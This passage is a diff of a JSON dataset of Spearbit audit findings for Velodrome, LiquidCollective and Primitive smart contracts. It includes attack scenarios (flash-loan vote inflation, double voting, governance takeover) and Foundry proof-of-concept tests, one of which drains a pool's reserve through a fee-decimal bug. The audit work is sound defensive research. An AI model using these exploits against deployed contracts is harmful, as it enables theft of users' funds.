block.timestamp); } As a result, Velodrome or external protocols calling the balanceOfNFT and balanceOfNFTAt external functions will receive different voting balances for the same veNFT depending on which function they called. Additionally, the internal _balanceOfNFT function, which does not have flash-loan protection, is called by the VotingEscrow.getVotes function to compute the voting balance of an account. The VotingEscrow.getVotes function appears not to be used in any in-scope contracts; however, this function might be utilized by some external protocols or off-chain components to tally the votes. If that is the case, a malicious user could flash-loan the veNFTs to inflate the voting balance of their account.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Remove unused constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "DENOMINATION_OFFSET is unused and can be removed from the codebase.", + "title": "Nudge check will break once limit is reached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because both sides are checked, once oldRate reaches the maximum rate, every new nudge call will revert. This means that if _newRate ever gets to MAXIMUM_TAIL_RATE or MINIMUM_TAIL_RATE, nudge will stop working.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Document what TotalRequestedExits can potentially represent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Documentation is lacking for TotalRequestedExits. This parameter represents a quantity that is a mix of exited (or to be exited) and slashed validators for an operator.
Also, in general, this is a rough quantity since we don't have a finer reporting of slashed and exited validators (they are reported as a sum).", + "title": "ownershipChange can be sidestepped", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The check there is to prevent depositing into a managed NFT right after a transfer or creation: require(ownershipChange[_tokenId] != block.number, \"VotingEscrow: flash nft protection\"); However, it doesn't prevent adding to and removing from other managed tokens, merging, or splitting. Because ownershipChange is updated exclusively in _transferFrom, we can sidestep it being set by splitting the lock into a new one, which will not have the flag set.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Operators need to listen to RequestedValidatorExits and exit their validators accordingly: emit RequestedValidatorExits(operators[idx].index, requestedExits + operators[idx].picked); Note that requestedExits + operators[idx].picked represents the upper bound for the index of the funded validators that need to be exited by the operator.", + "title": "The fromBlock variable of a checkpoint is not initialized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "A checkpoint contains a fromBlock variable which stores the block number at which the checkpoint is created. /// @notice A checkpoint for marking delegated tokenIds from a given block struct Checkpoint { uint256 fromBlock; uint256[] tokenIds; } However, it was found that the fromBlock variable of a checkpoint was not initialized anywhere in the codebase. Therefore, any function that relies on the fromBlock of a checkpoint will break. The VotingEscrow._findWhatCheckpointToWrite and VotingEscrow.getPastVotesIndex functions were found to rely on the fromBlock variable of a checkpoint for computation. The following is a list of functions that call these two affected functions. _findWhatCheckpointToWrite -> _moveTokenDelegates -> _transferFrom _findWhatCheckpointToWrite -> _moveTokenDelegates -> _mint _findWhatCheckpointToWrite -> _moveTokenDelegates -> _burn _findWhatCheckpointToWrite -> _moveAllDelegates -> _delegate -> delegate/delegateBySig getPastVotesIndex -> getTokenIdsAt getPastVotesIndex -> getPastVotes -> GovernorSimpleVotes._getVotes Instance 1 - VotingEscrow._findWhatCheckpointToWrite function: The VotingEscrow._findWhatCheckpointToWrite function verifies if the fromBlock of the latest checkpoint of an account is equal to the current block number. If true, the function will return the index number of the last checkpoint. function _findWhatCheckpointToWrite(address account) internal view returns (uint32) { uint256 _blockNumber = block.number; uint32 _nCheckPoints = numCheckpoints[account]; if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) { return _nCheckPoints - 1; } else { return _nCheckPoints; } } As such, this function does not work as intended and will always return the index of a new checkpoint (a sketch of the missing initialization follows).
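Since the report stops short of showing a patch, here is a hedged sketch of one possible fix (not Velodrome's actual change; the variable name dstRep is an assumption borrowed from Comp-style delegation code): stamp fromBlock whenever a checkpoint slot is written, e.g. where _moveTokenDelegates writes the destination's next checkpoint:

// Hedged sketch only; uses the Checkpoint struct, _checkpoints mapping and
// numCheckpoints counter quoted in this finding.
uint32 dstIndex = _findWhatCheckpointToWrite(dstRep);
Checkpoint storage cp = _checkpoints[dstRep][dstIndex];
cp.fromBlock = block.number; // the missing initialization this finding is about
cp.tokenIds.push(_tokenId);  // plus the tokenId copying the existing code performs
if (dstIndex == numCheckpoints[dstRep]) {
    numCheckpoints[dstRep] = dstIndex + 1;
}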
Instance 2 - VotingEscrow.getPastVotesIndex function: The VotingEscrow.getPastVotesIndex function relies on the fromBlock of the latest checkpoint for optimization purposes. If the requested block number is at or after the most recently updated checkpoint, it will return the latest index immediately and skip the binary search. Since the fromBlock variable is not populated, the optimization will not work: function getPastVotesIndex(address account, uint256 blockNumber) public view returns (uint32) { uint32 nCheckpoints = numCheckpoints[account]; if (nCheckpoints == 0) { return 0; } // First check most recent balance if (_checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) { return (nCheckpoints - 1); } // Next check implicit zero balance if (_checkpoints[account][0].fromBlock > blockNumber) { return 0; } uint32 lower = 0; uint32 upper = nCheckpoints - 1; while (upper > lower) { uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow Checkpoint storage cp = _checkpoints[account][center]; if (cp.fromBlock == blockNumber) { return center; } else if (cp.fromBlock < blockNumber) { lower = center; } else { upper = center - 1; } } return lower; }", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Oracle members would need to listen to ClearedReporting and report their data if necessary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Oracle members would need to listen to the ClearedReporting event and report their data if necessary.", + "title": "Double voting by shifting the voting power between managed and normal NFTs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Owners of normal NFTs and managed NFTs could potentially collude to double vote, which affects the fairness of the gauge weight voting. A group of malicious veNFT owners could exploit this and use the inflated voting balance to redirect the VELO emission to gauges where they have a vested interest, causing losses to other users. The following shows that it is possible to increase the weight of a pool by 2000 with a 1000 voting balance within a single epoch by shifting the voting power between managed and normal NFTs. For simplicity's sake, assume the following: Alice is the owner of a managed NFT (tokenID=888); Bob is the owner of a normal NFT (tokenID=999); Alice's managed NFT (tokenID=888) consists only of one (1) normal NFT (tokenID=999), belonging to Bob, that is locked up. The following steps are executed within the same epoch. At the start, the state is as follows: Voting power of Alice's managed NFT (tokenID=888) is 1000. The 1000 voting power came from the normal NFT (tokenID=999) during the deposit: weights[_tokenId][_mTokenId] = _weight | weights[999][888] = 1000; Voting power of Bob's normal NFT (tokenID=999) is zero (0). Weight of Pool X = 0. Alice calls the Voter.vote function with her managed NFT (tokenID=888), and increases the weight of Pool X by 1000. Subsequently, lastVoted[_tokenId] = _timestamp at Line 222 in the Voter.vote function will be set, and the onlyNewEpoch modifier will ensure Alice cannot use the same managed NFT (tokenID=888) to vote again in the current epoch. However, Bob could call VotingEscrow.withdrawManaged to withdraw his normal NFT (tokenID=999) from the managed NFT (tokenID=888).
Within the function, it will call the internal _checkpoint function to \"transfer\" the voting power from the managed NFT (tokenID=888) to the normal NFT (tokenID=999). At this point, the state is as follows: Voting power of Alice's managed NFT (tokenID=888) is zero (0); voting power of Bob's normal NFT (tokenID=999) is 1000; weight of Pool X = 1000. Bob calls the Voter.vote function with his normal NFT (tokenID=999) and increases the weight of Pool X by 1000. Since the normal NFT (tokenID=999) has not voted in the current epoch, it is allowed to vote. The weight of Pool X becomes 2000. It was observed that a mechanism is in place to punish and disincentivize malicious behaviors from a managed NFT owner. The protocol's emergency council could deactivate managed NFTs involved in malicious activities via the VotingEscrow.setManagedState function. In addition, the ability to create a managed NFT is restricted to an authorized manager and the protocol's governor. These factors help to mitigate some risks related to this issue to a certain extent.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "The only way for an oracle member to change its report data for an epoch is to reset the reporting process by changing its address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "If an oracle member has made a mistake in its CL report to the Oracle or for some other reason would like to change its report, it would not be able to do so, due to the following if block: // we retrieve the voting status of the caller, and revert if already voted if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(report.epoch, msg.sender); } The only way for the said oracle member to be able to report different data is to reset its address by calling setMember. This would cause all the report variants and report positions to be cleared and force all the other oracle members to report their data again.
Related: any oracle member can censor almost-quorum report variants by resetting its address.", + "title": "MetaTX is using the incorrect Context", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Throughout the codebase, the code uses Context for _msgSender(). The implementation chosen resolves each _msgSender() to msg.sender, which is inconsistent with the goal of allowing meta-transactions (MetaTX).", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "For a quorum making CL report the epoch restrictions are checked twice.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "When an oracle member reports to the Oracle's reportConsensusLayerData, the requirements for a valid epoch are checked once in reportConsensusLayerData: // checks that the report epoch is not invalid if (!river.isValidEpoch(report.epoch)) { revert InvalidEpoch(report.epoch); } and once again in setConsensusLayerData: // we start by verifying that the reported epoch is valid based on the consensus layer spec if (!_isValidEpoch(cls, report.epoch)) { revert InvalidEpoch(report.epoch); } Note that only the Oracle can call the setConsensusLayerData endpoint and the only time the Oracle makes this call is when the quorum is reached in reportConsensusLayerData.", + "title": "depositFor function should be restricted to approved NFT types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The depositFor function was found to accept NFTs of all types (normal, locked, managed) without restriction. function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, \"VotingEscrow: zero amount\"); require(oldLocked.amount > 0, \"VotingEscrow: no existing lock found\"); require(oldLocked.end > block.timestamp, \"VotingEscrow: cannot add to expired lock, withdraw\"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } Instance 1 - Anyone can call depositFor against a locked NFT: Users should not be allowed to increase the voting power of a locked NFT by calling the depositFor function, as locked NFTs are not supposed to vote. Thus, any increase in the voting balance of locked NFTs will not increase the gauge weight, and as a consequence, the influence and yield of the deposited VELO will be diminished. In addition, the locked balance will be overwritten when the veNFT is later withdrawn from the managed veNFT, resulting in a loss of funds. Instance 2 - Anyone can call depositFor against a managed NFT: Only the RewardsDistributor.claim function should be allowed to call the depositFor function against a managed NFT, to process rebase rewards claimed and to compound the rewards into the LockedManagedReward contract.
However, anyone could also increase the voting power of a managed NFT directly by calling depositFor with a tokenId of a managed NFT, which breaks the invariant.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Clear report variants and report position data during the migration to the new contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Upon migration to the new contract with a new type of reporting data, the old report positions and variants should be cleared by calling _clearReports() on the new contract or an older counterpart on the old contract. Note that the report variants slot will be changed from: bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1) to: bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1)", + "title": "Lack of vetoer can lead to 51% attack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Veto power is important functionality in a governance system in order to protect against malicious proposals. However, there is no vetoer in VeloGovernor; this might leave Velodrome without veto power and open to a 51% attack. With a 51% attack, a malicious actor can change the governor in the Voter contract or bypass the token whitelist, adding a new gauge with a malicious token. References: dialectic.ch/editorial/nouns-governance-attack-2, code4rena.com/reports/2022-09-nouns-builder/#m-11-loss-of-veto-power-can-lead-to-51-attack", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Remove unused functions from Oracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The following functions are unused and can be removed from the Oracle's implementation: isValidEpoch, getTime, getExpectedEpochId, getLastCompletedEpochId, getCurrentEpochId, getCLSpec, getCurrentFrame, getFrameFirstEpochId, getReportBounds.", + "title": "Compromised or malicious owner can siphon rewards from the Voter contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The createGauge() function takes a _gaugeFactory parameter which is checked to be approved by the FactoryRegistry contract. However, the owner of this contract can approve any arbitrary gauge factory, hence the IGaugeFactory(_gaugeFactory).createGauge() call may return an EOA which steals rewards every time notifyRewardAmount() is called.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "RedeemManager._claimRedeemRequests - Consider adding the recipient to the revert message in case of failure", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The purpose of the _claimRedeemRequests function is to facilitate the claiming of ETH on behalf of another party who has a valid redeem request. It is worth noting that if any of the calls to recipients fail, the entire transaction will revert.
Although it is impossible to conduct a denial-of-service (DoS) attack in this scenario, as the worst-case scenario only allows the transaction sender to specify a different array of redeemRequestIds, it may still be challenging to determine the specific redemption request that caused the transaction to fail.", + "title": "Missing nonReentrant modifier on a state changing checkpoint function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The checkpoint() function will call the internal _checkpoint() function, which ultimately fills the point history and potentially updates the epoch state variable.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Exit validator picking strategy does not consider slashed validators between reported epoch and current epoch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current picking strategy in the OperatorsRegistry._pickNextValidatorsToExitFromActiveOperators function relies on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed, and so the strategy might pick and signal to the operators those validators that have been slashed. As a result, the suggested number of validators to exit the protocol to compensate for the redemption demand in the next round of reports might not be exactly what was requested. Similarly, the OperatorsV2._hasExitableKeys function only evaluates based on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed. Thus, some returned operators might not have exitable keys in the current epoch.", + "title": "Close to half of the trading fees may be paid one epoch late", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Due to how left() is implemented in Reward (returning the total amount of rewards for the epoch), _claimFees() will not queue rewards until the new fees are greater than the current ones for the epoch. This can cause the check to be false for values that are up to half minus one reward. Consider the following example: in the first second of a new epoch, we add 100 rewards. For the rest of the epoch, we accrue 99.99 rewards. The check is always false, so the 99.99 rewards will not be added to this epoch, despite having been accrued during it.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Duplicated functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The Operators.2._getStoppedValidatorCountAtIndex and OperatorsRegistry.1._getStoppedValidatorsCountFromRawArray functions are the same. File: Operators.2.sol function _getStoppedValidatorCountAtIndex(uint32[] storage stoppedValidatorCounts, uint256 index) internal view returns (uint32) { if (index + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[index + 1]; } File: OperatorsRegistry.1.sol function _getStoppedValidatorsCountFromRawArray(uint32[] storage stoppedValidatorCounts, uint256 operatorIndex) internal view returns (uint32) { if (operatorIndex + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[operatorIndex + 1]; }", + "title": "Not synced with Epochs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "If there are enough delays in calling the notifyRewardAmount() function, a full desync can happen.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Funds might be pulled from CoverageFundV1 even when there has been no slashing incident.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "vars.availableAmountToUpperBound might be positive even though no validators have been slashed. In this case, we still pull funds from the coverage funds contract to get closer to the upper bound limit: // if we have available amount to upper bound after pulling the exceeding eth buffer, we attempt to pull coverage funds if (vars.availableAmountToUpperBound > 0) { // we pull the funds from the coverage recipient vars.trace.pulledCoverageFunds = _pullCoverageFunds(vars.availableAmountToUpperBound); // we do not update the rewards as coverage is not considered rewards // we do not update the available amount as there are no more pulling actions to perform afterwards } So it is possible that coverage funds get used even when there has been no slashing to account for.", + "title": "Dust losses in notifyRewardAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "This can cause dust losses which are marginal but are never queued back (see private link to code-423n4/2022-10-3xcalibur-findings#410), unlike the SNX implementation, which does queue the dust back. Users may be diluted by distributing the _leftover amount of another epoch period of length DURATION if the total supply deposited in the gauge continues to increase over this same period. On the flip side, they may also benefit if users withdraw funds from the gauge during the same epoch.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Update inline documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": " OracleManager.1.sol functions highlighted in Context are missing the @return natspec. IOracle.1.sol#L204's highlighted comment is outdated: setMember can now also be called by the member itself. Also, there is a typo: adminitrator -> administrator. File: IOracle.1.sol /// @dev Only callable by the adminitrator (@audit typo and outdated) function setMember(address _oracleMember, address _newAddress) external; File: Oracle.1.sol modifier onlyAdminOrMember(address _oracleMember) { if (msg.sender != _getAdmin() && msg.sender != _oracleMember) { revert LibErrors.Unauthorized(msg.sender); } _; } ... function setMember(address _oracleMember, address _newAddress) external onlyAdminOrMember(_oracleMember) {", + "title": "All rewards are lost until Gauge or Bribe deposits are non-zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Flagging this old finding, which is still valid for all SNX-like gauges.
See private link to code-423n4/2022-10-3xcalibur-findings#429. Because the rewards are emitted over DURATION, if no deposit has happened and notifyRewardAmount() is called with a non-zero value, all rewards will be forfeited until totalSupply is non-zero, as nobody will be able to claim them.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Document/mark unused (would-be-stale) storage parameters after migration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The following storage parameters will be unused after the migration of the protocol to v1: CLValidatorCount, CLValidatorTotalBalance, LastOracleRoundId.sol, OperatorsV1 (this will be more than one slot, as it occupies regions of storage), and ReportVariants (the slot has been changed, meaning that right after migration ReportVariants will be an empty array by default): - bytes32 internal constant REPORTS_VARIANTS_SLOT = bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1); + bytes32 internal constant REPORT_VARIANTS_SLOT = bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1);", + "title": "Difference in getPastTotalSupply and propose", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The getPastTotalSupply() function currently uses block.number, but OpenZeppelin's propose() function will use votes from block.timestamp - 1 as seen here. This could enable a front-run that increases the total supply and causes the proposer to be unable to propose(), requiring more tokens than expected if the total supply can grow within one block. Proposals could be denied as long as a whale is willing to lock more tokens to increase the total supply and thereby the proposal threshold.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "pullEth, pullELFees and pullExceedingEth do not check for a non-zero amount before sending funds to River", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "pullCoverageFunds makes sure that the amount sent to River is non-zero before calling its corresponding endpoint. This behavior differs from the implementations of pullELFees, pullExceedingEth and pullEth. Not checking for a non-zero value has the added benefit of saving gas when the value is non-zero, while the check for a non-zero value before calling back River saves gas for cases when the amount could be 0.", + "title": "Delaying update_period may award more emissions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The first nudge can be performed in the first tail period, so delaying update_period() may award more emissions: because of the possible delay with the first proposal, waiting to call update_period() will allow the use of the updated, nudged value. This is marginal (1 bps in difference).", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Protocol fees are double-counted as registry balance and pool reserve", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When swapping, the registry is credited a protocolFee.
However, this fee is always reinvested in the pool, meaning the virtualX or virtualY pool reserves per liquidity increase by protocolFee / liquidity. The protocol fee is now double-counted as the registry's user balance and the pool reserve, while the global reserves are only increased by the protocol fee once in _increaseReserves(_state.tokenInput, iteration.input). A protocol fee breaks the invariant that the global reserve should be greater than the sum of user balances and fees plus the sum of pool reserves. As the protocol fee is reinvested, LPs can withdraw it. If users and LPs decide to withdraw all their balances, the registry can't withdraw their fees anymore. Conversely, if the registry withdraws the protocol fee, not all users can withdraw their balances anymore. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_protocol_fee_reinvestment() public noJit defaultConfig useActor usePairTokens(100e18) allocateSome(10e18) // deltaLiquidity isArmed { // Set fee, 1/5 = 20% SimpleRegistry(subjects().registry).setFee(address(subject()), 5); // swap // make invariant go negative s.t. all fees are reinvested, not strictly necessary vm.warp(block.timestamp + 1 days); uint128 amtIn = 1e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); // deallocate and earn reinvested LP fees + protocol fees, emptying _entire_ reserve including protocol fees subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax will set this to freeLiquidity }) ); subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 protocol_fee = ghost().balance(subjects().registry, ghost().asset().to_addr()); assertEq(protocol_fee, amtIn / 100 / 5); // 20% of 1% of 1e18 // the global reserve is 0 even though the protocol fee should still exist uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); assertEq(reserve_asset, 0); // reverts with InsufficientReserve(0, 2000000000000000) SimpleRegistry(subjects().registry).claimFee( address(subject()), ghost().asset().to_addr(), protocol_fee, address(this) ); } }", + "title": "Incorrect math for future factories and pools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because quoteLiquidity() assumes an x * y = k formula, its quote value will be incorrect when using a custom factory that uses a different curve.
//Router.sol#L673-L700 function _quoteZapLiquidity( address tokenA, address tokenB, bool stable, address _factory, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin ) internal view returns (uint256 amountA, uint256 amountB) { require(amountADesired >= amountAMin); require(amountBDesired >= amountBMin); (uint256 reserveA, uint256 reserveB) = getReserves(tokenA, tokenB, stable, _factory); if (reserveA == 0 && reserveB == 0) { (amountA, amountB) = (amountADesired, amountBDesired); } else { uint256 amountBOptimal = quoteLiquidity(amountADesired, reserveA, reserveB); if (amountBOptimal <= amountBDesired) { require(amountBOptimal >= amountBMin, \"Router: insufficient B amount\"); (amountA, amountB) = (amountADesired, amountBOptimal); } else { uint256 amountAOptimal = quoteLiquidity(amountBDesired, reserveB, reserveA); assert(amountAOptimal <= amountADesired); require(amountAOptimal >= amountAMin, \"Router: insufficient A amount\"); (amountA, amountB) = (amountAOptimal, amountBDesired); } } } The math may be incorrect for future factories and pools: while the current math is valid for x * y = k, any new AMM math (e.g. bounded/V3 math, Curve V2, oracle-driven AMMs) may turn out to be incorrect. This may cause issues when performing zaps with custom factories.", "labels": [ "Spearbit", - "Primitive", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "LP fees are in WAD instead of token decimal units", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, feeAmount is also in WAD as a percentage of deltaInput. When calling _feeSavingEffects(args.poolId, iteration) to determine whether to reinvest the fees in the pool or earmark them for LPs, a _syncFeeGrowthAccumulator is done with the following parameter: _syncFeeGrowthAccumulator(FixedPointMathLib.divWadDown(iteration.feeAmount, iteration.liquidity)) This is a WAD per liquidity value stored in _state.feeGrowthGlobal and also in pool.feeGrowthGlobalAsset through a subsequent _syncPool call. If an LP claims now and their fees are synced with syncPositionFees, their tokensOwed is set to: uint256 differenceAsset = AssemblyLib.computeCheckpointDistance( feeGrowthAsset=pool.feeGrowthGlobalAsset, self.feeGrowthAssetLast ); feeAssetEarned = FixedPointMathLib.mulWadDown(differenceAsset, self.freeLiquidity); self.tokensOwedAsset += SafeCastLib.safeCastTo128(feeAssetEarned); Then tokensOwedAsset is increased by a WAD value (WAD per WAD liquidity multiplied by WAD liquidity) and they are credited this WAD value with _applyCredit(msg.sender, asset, claimedAssets), which they can then withdraw as a token decimal value. The result is that LP fees are credited and can be withdrawn as WAD units, and tokens with fewer than 18 decimals can be stolen from the protocol. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_fee_decimal_bug() public sixDecimalQuoteConfig useActor usePairTokens(31e18) allocateSome(100e18) // deltaLiquidity isArmed { // Understand current pool values.
create pair initializes from price // DEFAULT_STRIKE=10e18 = 10.0 quote per asset = 1e7/1e18 = 1e-11 uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); uint256 reserve_quote = ghost().reserve(ghost().quote().to_addr()); assertEq(reserve_asset, 30.859596948332370800e18); assertEq(reserve_quote, 308.595965e6); // Do swap from quote -> asset, so we catch fee on quote bool sellAsset = false; // amtIn is in quote. gets scaled to WAD in `_swap`. uint128 amtIn = 100; // 0.0001$ ~ 1e14 iteration.input uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); { // verify that before swap, we have no credit uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 0, \"token-credit\"); } uint256 pre_swap_balance = ghost().quote().to_token().balanceOf(actor()); subject().multiprocess( FVMLib.encodeSwap( uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0) ) ); subject().multiprocess( // claim it all FVMLib.encodeClaim(ghost().poolId, type(uint128).max, type(uint128).max) ); // we got credited tokensOwed = 1% of 1e14 input = 1e12 quote tokens uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 1e12, \"tokens-owed\"); // can withdraw the credited tokens, would underflow reserve, so just rug the entire reserve reserve_quote = ghost().reserve(ghost().quote().to_addr()); subject().draw(ghost().quote().to_addr(), reserve_quote, actor()); uint256 post_draw_balance = ghost().quote().to_token().balanceOf(actor()); // -amtIn because reserve_quote already got increased by it, otherwise we'd be double-counting assertEq(post_draw_balance, pre_swap_balance + reserve_quote - amtIn, \"post-draw-balance-mismatch\"); } }", + "title": "Add function to remove whitelisted token and NFT", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In the Voter contract, the governor can only add tokens and NFTs to the whitelist array. However, it is missing the functionality to remove whitelisted tokens and NFTs. If any whitelisted token or NFT has an issue, it cannot be removed from the list.", "labels": [ "Spearbit", - "Primitive", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Swaps can be done for free and steal the reserve given large liquidity allocation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "A swap of inputDelta tokens for outputDelta tokens is accepted if the invariant after the swap did not decrease. The after-swap invariant is recomputed using the pool's new virtual reserves (per liquidity) virtualX and virtualY: // becomes virtualX (reserveX) if swapping X -> Y nextIndependent = liveIndependent + deltaInput.divWadDown(iteration.liquidity); // becomes virtualY (reserveY) if swapping X -> Y nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity); // in checkInvariant int256 nextInvariant = RMM01Lib.invariantOf({ self: pools[poolId], R_x: reserveX, R_y: reserveY, timeRemainingSec: tau }); 